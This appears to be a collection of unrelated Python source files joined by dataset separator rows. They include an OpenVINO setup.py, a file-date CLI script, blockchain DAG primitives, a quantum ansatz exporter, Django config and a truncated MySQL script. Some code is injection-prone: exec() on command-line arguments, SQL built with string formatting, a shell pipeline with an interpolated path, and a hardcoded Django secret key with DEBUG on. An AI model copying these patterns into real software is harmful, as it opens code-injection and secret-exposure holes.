from shutil import copyfile, rmtree
from distutils.command.build import build
from distutils.command.clean import clean
from distutils.errors import DistutilsSetupError
from distutils.file_util import copy_file
from distutils import log
from setuptools import setup, find_namespace_packages, Extension
from setuptools.command.build_ext import build_ext
from setuptools.command.build_clib import build_clib
from setuptools.command.install import install
from decouple import config
WHEEL_LIBS_INSTALL_DIR = os.path.join('openvino', 'libs')
WHEEL_LIBS_PACKAGE = 'openvino.libs'
PYTHON_VERSION = f'python{sys.version_info.major}.{sys.version_info.minor}'
LIBS_DIR = 'bin' if platform.system() == 'Windows' else 'lib'
CONFIG = 'Release' if platform.system() == 'Windows' else ''
machine = platform.machine()
if machine == 'x86_64' or machine == 'AMD64':
ARCH = 'intel64'
elif machine == 'X86':
ARCH = 'ia32'
elif machine == 'arm':
ARCH = 'arm'
elif machine == 'aarch64':
ARCH = 'arm64'
# The following variables can be defined in environment or .env file
CMAKE_BUILD_DIR = config('CMAKE_BUILD_DIR', '.')
CORE_LIBS_DIR = config('CORE_LIBS_DIR', f'deployment_tools/inference_engine/{LIBS_DIR}/{ARCH}/{CONFIG}')
PLUGINS_LIBS_DIR = config('PLUGINS_LIBS_DIR', f'deployment_tools/inference_engine/{LIBS_DIR}/{ARCH}/{CONFIG}')
NGRAPH_LIBS_DIR = config('NGRAPH_LIBS_DIR', 'deployment_tools/ngraph/lib')
TBB_LIBS_DIR = config('TBB_LIBS_DIR', f'deployment_tools/inference_engine/external/tbb/{LIBS_DIR}')
PY_PACKAGES_DIR = config('PY_PACKAGES_DIR', f'python/{PYTHON_VERSION}')
LIBS_RPATH = '$ORIGIN' if sys.platform == 'linux' else '@loader_path'
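# Illustrative .env sketch (values here are assumptions, shown only to document the
# decouple-based configuration above; any key can equally be set in the environment):
#
#   CMAKE_BUILD_DIR=../../../../build
#   CORE_LIBS_DIR=deployment_tools/inference_engine/lib/intel64
#   PY_PACKAGES_DIR=python/python3.8
#   WHEEL_VERSION=2021.4.0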
LIB_INSTALL_CFG = {
'ie_libs': {
'name': 'core',
'prefix': 'libs.core',
'install_dir': CORE_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'hetero_plugin': {
'name': 'hetero',
'prefix': 'libs.plugins',
'install_dir': PLUGINS_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'gpu_plugin': {
'name': 'gpu',
'prefix': 'libs.plugins',
'install_dir': PLUGINS_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'cpu_plugin': {
'name': 'cpu',
'prefix': 'libs.plugins',
'install_dir': PLUGINS_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'multi_plugin': {
'name': 'multi',
'prefix': 'libs.plugins',
'install_dir': PLUGINS_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'myriad_plugin': {
'name': 'myriad',
'prefix': 'libs.plugins',
'install_dir': PLUGINS_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'ngraph_libs': {
'name': 'ngraph',
'prefix': 'libs.ngraph',
'install_dir': NGRAPH_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'tbb_libs': {
'name': 'tbb',
'prefix': 'libs.tbb',
'install_dir': TBB_LIBS_DIR,
'rpath': LIBS_RPATH,
},
}
PY_INSTALL_CFG = {
'ie_py': {
'name': PYTHON_VERSION,
'prefix': 'site-packages',
'install_dir': PY_PACKAGES_DIR,
},
'ngraph_py': {
'name': f'pyngraph_{PYTHON_VERSION}',
'prefix': 'site-packages',
'install_dir': PY_PACKAGES_DIR,
},
}
class PrebuiltExtension(Extension):
"""Initialize Extension"""
def __init__(self, name, sources, *args, **kwargs):
if len(sources) != 1:
nln = '\n'
raise DistutilsSetupError(f'PrebuiltExtension can accept only one source, but got: {nln}{nln.join(sources)}')
super().__init__(name, sources, *args, **kwargs)
class CustomBuild(build):
"""Custom implementation of build_clib"""
cmake_build_types = ['Release', 'Debug', 'RelWithDebInfo', 'MinSizeRel']
user_options = [
('config=', None, 'Build configuration [{types}].'.format(types='|'.join(cmake_build_types))),
('jobs=', None, 'Specifies the number of jobs to use with make.'),
('cmake-args=', None, 'Additional options to be passed to CMake.'),
]
def initialize_options(self):
"""Set default values for all the options that this command supports."""
super().initialize_options()
self.build_base = 'build'
self.config = None
self.jobs = None
self.cmake_args = None
def finalize_options(self):
"""Set final values for all the options that this command supports."""
super().finalize_options()
if not self.config:
if self.debug:
self.config = 'Debug'
else:
self.announce('Set default value for CMAKE_BUILD_TYPE = Release.', level=4)
self.config = 'Release'
else:
build_types = [item.lower() for item in self.cmake_build_types]
try:
i = build_types.index(str(self.config).lower())
self.config = self.cmake_build_types[i]
self.debug = True if 'Debug' == self.config else False
except ValueError:
self.announce('Unsupported CMAKE_BUILD_TYPE value: ' + self.config, level=4)
self.announce('Supported values: {types}'.format(types=', '.join(self.cmake_build_types)), level=4)
sys.exit(1)
if self.jobs is None and os.getenv('MAX_JOBS') is not None:
self.jobs = os.getenv('MAX_JOBS')
self.jobs = multiprocessing.cpu_count() if self.jobs is None else int(self.jobs)
def run(self):
global CMAKE_BUILD_DIR
self.jobs = multiprocessing.cpu_count()
plat_specifier = '.{0}-{1}.{2}'.format(self.plat_name, *sys.version_info[:2])
self.build_temp = os.path.join(self.build_base, 'temp' + plat_specifier, self.config)
# if setup.py is directly called use CMake to build product
if CMAKE_BUILD_DIR == '.':
# set path to the root of OpenVINO CMakeList file
openvino_root_dir = Path(__file__).resolve().parents[4]
self.announce(f'Configuring cmake project: {openvino_root_dir}', level=3)
self.spawn(['cmake', '-H' + str(openvino_root_dir), '-B' + self.build_temp,
'-DCMAKE_BUILD_TYPE={type}'.format(type=self.config),
'-DENABLE_PYTHON=ON',
'-DNGRAPH_ONNX_FRONTEND_ENABLE=ON'])
self.announce('Building binaries', level=3)
self.spawn(['cmake', '--build', self.build_temp,
'--config', self.config, '-j', str(self.jobs)])
CMAKE_BUILD_DIR = self.build_temp
self.run_command('build_clib')
build.run(self)
# Copy extra package_data content filtered by find_packages
dst = Path(self.build_lib)
src = Path(get_package_dir(PY_INSTALL_CFG))
exclude = ignore_patterns('*ez_setup*', '*__pycache__*', '*.egg-info*')
for path in src.glob('**/*'):
if path.is_dir() or exclude(str(path)):
continue
path_rel = path.relative_to(src)
(dst / path_rel.parent).mkdir(exist_ok=True, parents=True)
copyfile(path, dst / path_rel)
class PrepareLibs(build_clib):
"""Prepare prebuilt libraries"""
def run(self):
self.configure(LIB_INSTALL_CFG)
self.configure(PY_INSTALL_CFG)
self.generate_package(get_dir_list(LIB_INSTALL_CFG))
def configure(self, install_cfg):
"""Collect prebuilt libraries. Install them to the temp directories, set rpath."""
for comp, comp_data in install_cfg.items():
install_prefix = comp_data.get('prefix')
install_dir = comp_data.get('install_dir')
if install_dir and not os.path.isabs(install_dir):
install_dir = os.path.join(install_prefix, install_dir)
self.announce(f'Installing {comp}', level=3)
self.spawn(['cmake', '--install', CMAKE_BUILD_DIR, '--prefix', install_prefix, '--component', comp_data.get('name')])
# set rpath if applicable
if sys.platform != 'win32' and comp_data.get('rpath'):
file_types = ['.so'] if sys.platform == 'linux' else ['.dylib', '.so']
for path in filter(lambda p: any(item in file_types for item in p.suffixes), Path(install_dir).glob('*')):
set_rpath(comp_data['rpath'], os.path.realpath(path))
def generate_package(self, src_dirs):
"""
Collect package data files from preinstalled dirs and
        put all runtime libraries into the subpackage
"""
# additional blacklist filter, just to fix cmake install issues
blacklist = ['.lib', '.pdb', '_debug.dll', '_debug.dylib']
package_dir = os.path.join(get_package_dir(PY_INSTALL_CFG), WHEEL_LIBS_INSTALL_DIR)
for src_dir in src_dirs:
local_base_dir = Path(src_dir)
for file_path in local_base_dir.rglob('*'):
file_name = os.path.basename(file_path)
if file_path.is_file() and not any(file_name.endswith(ext) for ext in blacklist):
dst_file = os.path.join(package_dir, os.path.relpath(file_path, local_base_dir))
os.makedirs(os.path.dirname(dst_file), exist_ok=True)
copyfile(file_path, dst_file)
if Path(package_dir).exists():
self.announce(f'Adding {WHEEL_LIBS_PACKAGE} package', level=3)
packages.append(WHEEL_LIBS_PACKAGE)
package_data.update({WHEEL_LIBS_PACKAGE: ['*']})
class CopyExt(build_ext):
"""Copy extension files to the build directory"""
def run(self):
if len(self.extensions) == 1:
self.run_command('build_clib')
self.extensions = []
self.extensions = find_prebuilt_extensions(get_dir_list(PY_INSTALL_CFG))
for extension in self.extensions:
if not isinstance(extension, PrebuiltExtension):
raise DistutilsSetupError(f'copy_ext can accept PrebuiltExtension only, but got {extension.name}')
src = extension.sources[0]
dst = self.get_ext_fullpath(extension.name)
os.makedirs(os.path.dirname(dst), exist_ok=True)
# setting relative path to find dlls
if sys.platform != 'win32':
rpath = os.path.relpath(get_package_dir(PY_INSTALL_CFG), os.path.dirname(src))
if sys.platform == 'linux':
rpath = os.path.join('$ORIGIN', rpath, WHEEL_LIBS_INSTALL_DIR)
elif sys.platform == 'darwin':
rpath = os.path.join('@loader_path', rpath, WHEEL_LIBS_INSTALL_DIR)
set_rpath(rpath, os.path.realpath(src))
copy_file(src, dst, verbose=self.verbose, dry_run=self.dry_run)
class CustomInstall(install):
"""Enable build_clib during the installation"""
def run(self):
self.run_command('build')
install.run(self)
class CustomClean(clean):
"""Clean up staging directories"""
def clean(self, install_cfg):
for comp, comp_data in install_cfg.items():
install_prefix = comp_data.get('prefix')
self.announce(f'Cleaning {comp}: {install_prefix}', level=3)
if os.path.exists(install_prefix):
rmtree(install_prefix)
def run(self):
self.clean(LIB_INSTALL_CFG)
self.clean(PY_INSTALL_CFG)
clean.run(self)
def ignore_patterns(*patterns):
"""
Filter names by given patterns
"""
return lambda name: any(fnmatchcase(name, pat=pat) for pat in patterns)
def is_tool(name):
"""Check if the command-line tool is available"""
try:
devnull = subprocess.DEVNULL
subprocess.Popen([name], stdout=devnull, stderr=devnull).communicate() # nosec
except OSError as error:
if error.errno == errno.ENOENT:
return False
return True
def remove_rpath(file_path):
"""
Remove rpath from binaries
:param file_path: binary path
:type file_path: pathlib.Path
"""
if sys.platform == 'darwin':
cmd = (
f'otool -l {file_path} ' # noqa: P103
f'| grep LC_RPATH -A3 '
f'| grep -o "path.*" '
f'| cut -d " " -f2 '
f'| xargs -I{{}} install_name_tool -delete_rpath {{}} {file_path}'
)
if os.WEXITSTATUS(os.system(cmd)) != 0: # nosec
sys.exit(f'Could not remove rpath for {file_path}')
else:
sys.exit(f'Unsupported platform: {sys.platform}')
def set_rpath(rpath, executable):
"""Setting rpath for linux and macOS libraries"""
print(f'Setting rpath {rpath} for {executable}') # noqa: T001
cmd = []
rpath_tool = ''
if sys.platform == 'linux':
with open(os.path.realpath(executable), 'rb') as file:
if file.read(1) != b'\x7f':
log.warn(f'WARNING: {executable}: missed ELF header')
return
rpath_tool = 'patchelf'
cmd = [rpath_tool, '--set-rpath', rpath, executable]
elif sys.platform == 'darwin':
rpath_tool = 'install_name_tool'
cmd = [rpath_tool, '-add_rpath', rpath, executable]
else:
sys.exit(f'Unsupported platform: {sys.platform}')
if is_tool(rpath_tool):
if sys.platform == 'darwin':
remove_rpath(executable)
ret_info = subprocess.run(cmd, check=True, shell=False) # nosec
if ret_info.returncode != 0:
sys.exit(f'Could not set rpath: {rpath} for {executable}')
else:
        sys.exit(f'Could not find {rpath_tool} on the system, ' f'please make sure that this tool is installed')
def find_prebuilt_extensions(search_dirs):
"""collect prebuilt python extensions"""
extensions = []
ext_pattern = ''
if sys.platform == 'linux':
ext_pattern = '**/*.so'
elif sys.platform == 'win32':
ext_pattern = '**/*.pyd'
elif sys.platform == 'darwin':
ext_pattern = '**/*.so'
for base_dir in search_dirs:
for path in Path(base_dir).glob(ext_pattern):
if path.match('openvino/libs/*'):
continue
relpath = path.relative_to(base_dir)
            if str(relpath.parent) != '.':
package_names = str(relpath.parent).split(os.path.sep)
else:
package_names = []
package_names.append(path.name.split('.', 1)[0])
name = '.'.join(package_names)
extensions.append(PrebuiltExtension(name, sources=[str(path)]))
if not extensions:
extensions.append(PrebuiltExtension('openvino', sources=[str('setup.py')]))
return extensions
def get_description(desc_file_path):
"""read description from README.md"""
with open(desc_file_path, 'r', encoding='utf-8') as fstream:
description = fstream.read()
return description
def get_dependencies(requirements_file_path):
"""read dependencies from requirements.txt"""
with open(requirements_file_path, 'r', encoding='utf-8') as fstream:
dependencies = fstream.read()
return dependencies
def get_dir_list(install_cfg):
"""collect all available directories with libs or python packages"""
dirs = []
for comp_info in install_cfg.values():
cfg_prefix = comp_info.get('prefix')
cfg_dir = comp_info.get('install_dir')
if cfg_dir:
if not os.path.isabs(cfg_dir):
cfg_dir = os.path.join(cfg_prefix, cfg_dir)
if cfg_dir not in dirs:
dirs.append(cfg_dir)
return dirs
def get_package_dir(install_cfg):
"""
Get python package path based on config
All the packages should be located in one directory
"""
py_package_path = ''
dirs = get_dir_list(install_cfg)
if len(dirs) != 0:
# setup.py support only one package directory, all modules should be located there
py_package_path = dirs[0]
return py_package_path
platforms = ['linux', 'win32', 'darwin']
if not any(pl in sys.platform for pl in platforms):
sys.exit(f'Unsupported platform: {sys.platform}, expected: linux, win32, darwin')
# copy license file into the build directory
package_license = config('WHEEL_LICENSE', '')
if os.path.exists(package_license):
copyfile(package_license, 'LICENSE')
packages = find_namespace_packages(get_package_dir(PY_INSTALL_CFG))
package_data: typing.Dict[str, list] = {}
pkg_name = config('WHEEL_PACKAGE_NAME', 'openvino')
ext_modules = find_prebuilt_extensions(get_dir_list(PY_INSTALL_CFG)) if pkg_name == 'openvino' else []
setup(
version=config('WHEEL_VERSION', '0.0.0'),
build=config('WHEEL_BUILD', '000'),
author_email=config('WHEEL_AUTHOR_EMAIL', '[email protected]'),
name=pkg_name,
license=config('WHEEL_LICENCE_TYPE', 'OSI Approved :: Apache Software License'),
author=config('WHEEL_AUTHOR', 'Intel Corporation'),
description=config('WHEEL_DESC', 'Inference Engine Python* API'),
install_requires=get_dependencies(config('WHEEL_REQUIREMENTS', 'meta/openvino.requirements.txt')),
long_description=get_description(config('WHEEL_OVERVIEW', 'meta/pypi_overview.md')),
long_description_content_type='text/markdown',
download_url=config('WHEEL_DOWNLOAD_URL', 'https://github.com/openvinotoolkit/openvino/tags'),
url=config('WHEEL_URL', 'https://docs.openvinotoolkit.org/latest/index.html'),
cmdclass={
'build': CustomBuild,
'install': CustomInstall,
'build_clib': PrepareLibs,
'build_ext': CopyExt,
'clean': CustomClean,
},
ext_modules=ext_modules,
packages=packages,
package_dir={'': get_package_dir(PY_INSTALL_CFG)},
package_data=package_data,
zip_safe=False,
)
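# Build sketch (commands are assumptions based on the options defined above, not an
# official recipe): with a pre-built OpenVINO tree, point CMAKE_BUILD_DIR at it and
# produce the wheel; without it, setup.py drives the CMake build itself:
#
#   CMAKE_BUILD_DIR=../../../../build python setup.py bdist_wheel
#   python setup.py build --config=Release --jobs=8 && python setup.py bdist_wheel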
|
py | b415d14cc4bdf45cf5ed3b1a8d1742e819da255d | #!/usr/local/bin/python
# encoding: utf-8
"""
*Get the file creation and modification dates*
:Author:
David Young
:Date Created:
December 10, 2013
.. todo::
@review: when complete pull all general functions and classes into dryxPython
Usage:
get_file_creation_modification_dates --pathToFile=<pathToFile>
-h, --help show this help message
-v, --version show version
"""
################# GLOBAL IMPORTS ####################
import sys
import os
from docopt import docopt
from dryxPython import logs as dl
import __init__ as dcu
def main(arguments=None):
"""
*The main function used when ``get_file_creation_modification_dates.py`` is run as a single script from the cl, or when installed as a cl command*
"""
########## IMPORTS ##########
## STANDARD LIB ##
## THIRD PARTY ##
## LOCAL APPLICATION ##
## ACTIONS BASED ON WHICH ARGUMENTS ARE RECEIVED ##
# PRINT COMMAND-LINE USAGE IF NO ARGUMENTS PASSED
if arguments == None:
arguments = docopt(__doc__)
# SETUP LOGGER -- DEFAULT TO CONSOLE LOGGER IF NONE PROVIDED IN SETTINGS
if 'settings' in locals() and "logging settings" in settings:
log = dl.setup_dryx_logging(
yaml_file=arguments["--settingsFile"]
)
elif "--logger" not in arguments or arguments["--logger"] is None:
log = dl.console_logger(
level="WARNING"
)
log.debug('logger setup')
# unpack remaining cl arguments using `exec` to setup the variable names
# automatically
for arg, val in arguments.iteritems():
varname = arg.replace("--", "")
if isinstance(val, str) or isinstance(val, unicode):
exec(varname + " = '%s'" % (val,))
else:
exec(varname + " = %s" % (val,))
if arg == "--dbConn":
dbConn = val
log.debug('%s = %s' % (varname, val,))
## START LOGGING ##
startTime = dcu.get_now_sql_datetime()
log.info(
'--- STARTING TO RUN THE get_file_creation_modification_dates.py AT %s' %
(startTime,))
# call the worker function
# x-if-settings-or-database-credientials
dateCreated, dateModified = get_file_creation_modification_dates(
log=log,
pathToFile=pathToFile,
)
print "Created: %s, Modified: %s" % (dateCreated, dateModified)
if "dbConn" in locals() and dbConn:
dbConn.commit()
dbConn.close()
## FINISH LOGGING ##
endTime = dcu.get_now_sql_datetime()
runningTime = dcu.calculate_time_difference(startTime, endTime)
log.info(
'-- FINISHED ATTEMPT TO RUN THE get_file_creation_modification_dates.py AT %s (RUNTIME: %s) --' %
(endTime, runningTime, ))
return
###################################################################
# CLASSES #
###################################################################
###################################################################
# PUBLIC FUNCTIONS #
###################################################################
# LAST MODIFIED : December 10, 2013
# CREATED : December 10, 2013
# AUTHOR : DRYX
def get_file_creation_modification_dates(
log,
pathToFile,
):
"""
*get_file_creation_modification_dates*
**Key Arguments:**
- ``log`` -- the logger
- ``pathToFile`` -- pathToFile
**Return:**
- ``dateCreated`` and ``dateModified`` -- the date the file was created and last modified
.. todo::
@review: when complete, clean worker function and add comments
@review: when complete add logging
"""
################ > IMPORTS ################
## STANDARD LIB ##
import os
import datetime
from time import strftime
## THIRD PARTY ##
## LOCAL APPLICATION ##
dateCreated = os.path.getctime(pathToFile)
dateCreated = datetime.datetime.fromtimestamp(dateCreated)
dateModified = os.path.getmtime(pathToFile)
dateModified = datetime.datetime.fromtimestamp(dateModified)
return dateCreated, dateModified
# use the tab-trigger below for new function
# x-def-with-logger
###################################################################
# PRIVATE (HELPER) FUNCTIONS #
###################################################################
############################################
# CODE TO BE DEPRECATED #
############################################
if __name__ == '__main__':
main()
###################################################################
# TEMPLATE FUNCTIONS #
###################################################################
|
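# A standard-library-only sketch of the same ctime/mtime lookup as the worker
# function above, without the dryxPython logger; the path is a placeholder.
# Caveat: on Linux, getctime reports the inode-change time, not a true
# creation time.
import os
import datetime

path_to_file = '/tmp/example.txt'  # hypothetical file
date_created = datetime.datetime.fromtimestamp(os.path.getctime(path_to_file))
date_modified = datetime.datetime.fromtimestamp(os.path.getmtime(path_to_file))
print("Created: %s, Modified: %s" % (date_created, date_modified))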
py | b415d17786098c013d11d9ce2e1e0304774e8779 | import hashlib
import crypto
from collections import namedtuple
MIN_WORK = '000'
# directed acyclic graph primitives
# OpenTx
# params:
# account => which blockchain account you trying to open
# hash => hash of the opentx
# work => work done to get the 'valid' txid (starts with X amount of zeros)
OpenTx = namedtuple("OpenTx", "account hash work")
# SendTx
# params:
# prev => previous hash
# hash => hash of the sendtx
# rpk => random pk (for stealth address)
# signature => signature to verify that the sender authorized it
# msg => msg type
# work => work done to get the 'valid' hash (starts with X amount of zeros)
SendTx = namedtuple("SendTx", "prev hash rpk destination signature msg work")
# ReceiveTx
# params:
# prev => previous hash
# hash => hash of the receive tx
# source => source of the receiveTx (hash of the sendtx)
# work => work done to get the 'valid' hash (starts with X amount of zeros)
ReceiveTx = namedtuple("ReceiveTx", "prev hash source work")
# DAG
class DAG:
def __init__(self, usedtxids={}, cachehash={}, cachedmessages={}, accounts={}):
"""
params:
usedtxids => {}
cachehash => {}
cachedmessages => {}
accounts => {}
usedtxids is a dictionary containing used send txids
cachehash is a dictionary where key: hash value: tx
cachedmessages is a dictionary where key: hash, value: message
accounts is a dictionary where each key is an address e.g.
accounts = {
'abcdefgh': {
'latest': 5,
1: tx(),
2: tx(),
3: tx()
}
}
"""
self.usedtxids = usedtxids
self.accounts = accounts
self.cachehash = cachehash
self.cachedmessages = cachedmessages
def insert_tx(self, pk, tx):
t = type(tx)
if t == OpenTx:
self._insert_open(pk, tx)
elif t == SendTx:
self._insert_send(pk, tx)
elif t == ReceiveTx:
self._insert_receive(pk, tx)
self.cachehash[tx.hash] = tx
def _insert_open(self, pk, tx):
if not valid_work(tx):
return
# Don't overwrite existing account
if self.accounts.get(pk, None) is not None:
return
self.accounts[pk] = {
'latest': 0,
0: tx
}
def _insert_send(self, pk, tx):
if not (valid_signature(pk, tx) and valid_work(tx)):
return
if not (self.get_latest(pk).hash == tx.prev):
return
new_latest = self.accounts[pk]['latest'] + 1
self.accounts[pk]['latest'] = new_latest
self.accounts[pk][new_latest] = tx
def _insert_receive(self, pk, tx):
if not valid_work(tx):
return
if not (self.get_latest(pk).hash == tx.prev):
return
new_latest = self.accounts[pk]['latest'] + 1
self.accounts[pk]['latest'] = new_latest
self.accounts[pk][new_latest] = tx
def get_message(self, h):
return self.cachedmessages.get(h, None)
def get_messages(self):
return self.cachedmessages
def add_message(self, h, decrypted_msg):
self.cachedmessages[h] = decrypted_msg
def get_latest(self, pk):
pk_dict = self.accounts.get(pk, {})
if pk_dict == {}:
return None
latest_no = pk_dict['latest']
return pk_dict[latest_no]
def get_account(self, pk):
return self.accounts.get(pk, {})
def get_hash(self, h):
if self.hash_received(h):
return self.cachehash[h]
return None
def hash_received(self, h):
return h in self.cachehash
# Hashes an opentx
def hash_opentx(opentx):
bytestr = str.encode("account:{},work:{}".format(
opentx.account, opentx.work))
h = hashlib.sha256(bytestr).hexdigest()
return h
# Hashes a send tx
def hash_sendtx(sendtx):
bytestr = str.encode(
"prev:{},destination:{},rpk:{},signature:{},msg:{},work:{}".format(
sendtx.prev, sendtx.destination, sendtx.rpk, sendtx.signature, sendtx.msg, sendtx.work
)
)
h = hashlib.sha256(bytestr).hexdigest()
return h
# Hashes a receive tx
def hash_receivetx(receivetx):
bytestr = str.encode(
"prev:{},source:{},work:{}".format(
receivetx.prev, receivetx.source, receivetx.work
)
)
h = hashlib.sha256(bytestr).hexdigest()
return h
# Hashes tx
def hash_tx(tx):
t = type(tx)
if t != OpenTx and t != SendTx and t != ReceiveTx:
return -1
if t == OpenTx:
h = hash_opentx(tx)
elif t == SendTx:
h = hash_sendtx(tx)
elif t == ReceiveTx:
h = hash_receivetx(tx)
return h
def prep_signature(sendtx):
s = "prev:{},destination:{},rpk:{},msg:{}".format(
sendtx.prev, sendtx.destination, sendtx.rpk, sendtx.msg)
return s
def sign_sendtx(sk, sendtx):
sk = crypto.decodeint(sk[:64].decode('hex'))
msg = prep_signature(sendtx)
pk = crypto.publickey(sk)
sig = crypto.signature(msg, sk, pk)
# Reconstruct named tuple
tx_dict = sendtx._asdict()
tx_dict['signature'] = sig.encode('hex')
return SendTx(**tx_dict)
def valid_work(tx):
# Tx hash
h = hash_tx(tx)
return h[:len(MIN_WORK)] == MIN_WORK
def valid_signature(pk, sendtx):
sig = sendtx.signature.decode('hex')
msg = prep_signature(sendtx)
return crypto.checkvalid(sig, msg, pk[:64].decode('hex'))
def mine_tx(tx):
# Tx hash
h = hash_tx(tx)
# Tx type
t = type(tx)
if h == -1:
return -1
# Valid work done
# Python and recursion doesn't work well
# So i'll have to use a while loop
while not valid_work(tx):
d = tx._asdict()
d['work'] = tx.work + 1
tx = t(**d)
h = hash_tx(tx)
d = tx._asdict()
d['hash'] = h
return t(**d)
|
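# Hedged usage sketch for the block-lattice primitives above, assuming the file
# is saved as dag.py: mine an OpenTx by brute-forcing `work` until its hash
# carries the MIN_WORK prefix, then insert it for a placeholder account key.
import dag

ledger = dag.DAG()
pk = 'abcdefgh'  # placeholder account / public key

open_tx = dag.OpenTx(account=pk, hash=None, work=0)
open_tx = dag.mine_tx(open_tx)      # increments work until the hash starts with '000'
ledger.insert_tx(pk, open_tx)

print(ledger.get_latest(pk).hash)   # e.g. '000ab3...'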
py | b415d271ad31349eac7ac14ee52ea8b543b58df2 | import json
import cs_vqe_classes.cs_vqe_circuit as cs_circ
import utils.qonversion_tools as qonvert
from qeqiskit.conversions import import_from_qiskit
from zquantum.core.circuits import save_circuit
from zquantum.core.openfermion import save_qubit_operator
from zquantum.core import circuits, serialization
def ansatz_circuit(ham, terms_noncon, anz_op, num_qubits, num_sim_q):
with open(terms_noncon, 'r') as json_file:
terms_noncon = (json.load(json_file))['list']
mol_circ = cs_circ.cs_vqe_circuit(hamiltonian=ham,
terms_noncon=terms_noncon,
num_qubits=num_qubits)
# output reduced Hamiltonian
ham_red = (mol_circ.ham_reduced)[num_sim_q]
ham_red_q = qonvert.dict_to_QubitOperator(ham_red)
save_qubit_operator(ham_red_q, "ham_red.json")
# output Ansatz circuit
anz_circ = mol_circ.build_circuit(anz_op, num_sim_q)
anz_circ_zq = import_from_qiskit(anz_circ)
save_circuit(anz_circ_zq, "ansatz_circuit.json")
# output the initial parameter values
init_params = mol_circ.init_params(anz_op, num_sim_q)
serialization.save_array(init_params, "init_params.json") |
py | b415d304f522c6ed96879beea7b03d55d7f19a32 | """
WSGI config for HealthAndSafety project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'HealthAndSafety.settings')
application = get_wsgi_application()
|
py | b415d4358dbd636213bae94634c18dddaf4598d0 | """
Django settings for cowrywise_challenge project.
Generated by 'django-admin startproject' using Django 3.2.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-vd=gz^g#ws@ptd=bmo!afz+%ah&tz#$bukr1et2e(ofsrzmr=&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'timestamp_uuid_generator'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cowrywise_challenge.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'cowrywise_challenge.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
}
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
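# Minimal illustration of a view that would pick up the global
# PageNumberPagination / PAGE_SIZE = 10 setting above. The Stamp model and the
# app's module layout are assumptions, not part of the original project.
from rest_framework import generics, serializers

from timestamp_uuid_generator.models import Stamp  # hypothetical model


class StampSerializer(serializers.ModelSerializer):
    class Meta:
        model = Stamp
        fields = '__all__'


class StampListView(generics.ListAPIView):
    # Responses come back paginated 10 items per page via the REST_FRAMEWORK defaults.
    queryset = Stamp.objects.all()
    serializer_class = StampSerializer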
py | b415d4e244bbda66b3c817b408957c14e7d37835 | import mysql.connector as db
import random
from pprint import pprint
# DB CONNECTION
connection = db.connect(user='root', password='admin', host='localhost',
database='spotty', auth_plugin='mysql_native_password')
cursor = connection.cursor()
# QUERY
GET_USERS_QUERY = (
"select U.id, D.id "
"from User U inner join DailySuggestion D on U.id=D.suggestedFor;"
)
REMOVE_TRACK = (
"delete from TrackBelongsToPlaylist "
"where playlist='{}'"
)
GET_LIKED_TRACK = (
"select T.id "
"from Track T inner join LikesTrack L on T.id=L.track "
"where L.user='{}' "
"order by date desc "
"limit 5"
)
GET_SIMILAR_TRACK = (
"select track1, track2 "
"from Similarity "
"where track1='{}' or track2='{}' "
"order by amount "
"limit 3"
)
INSERT_TRACK = (
"insert ignore into TrackBelongsToPlaylist (track,playlist,addedDate) "
"values ('{}','{}',now())"
)
GET_MOST_LISTENED_GENRES = (
"select C.category, count(*) as n "
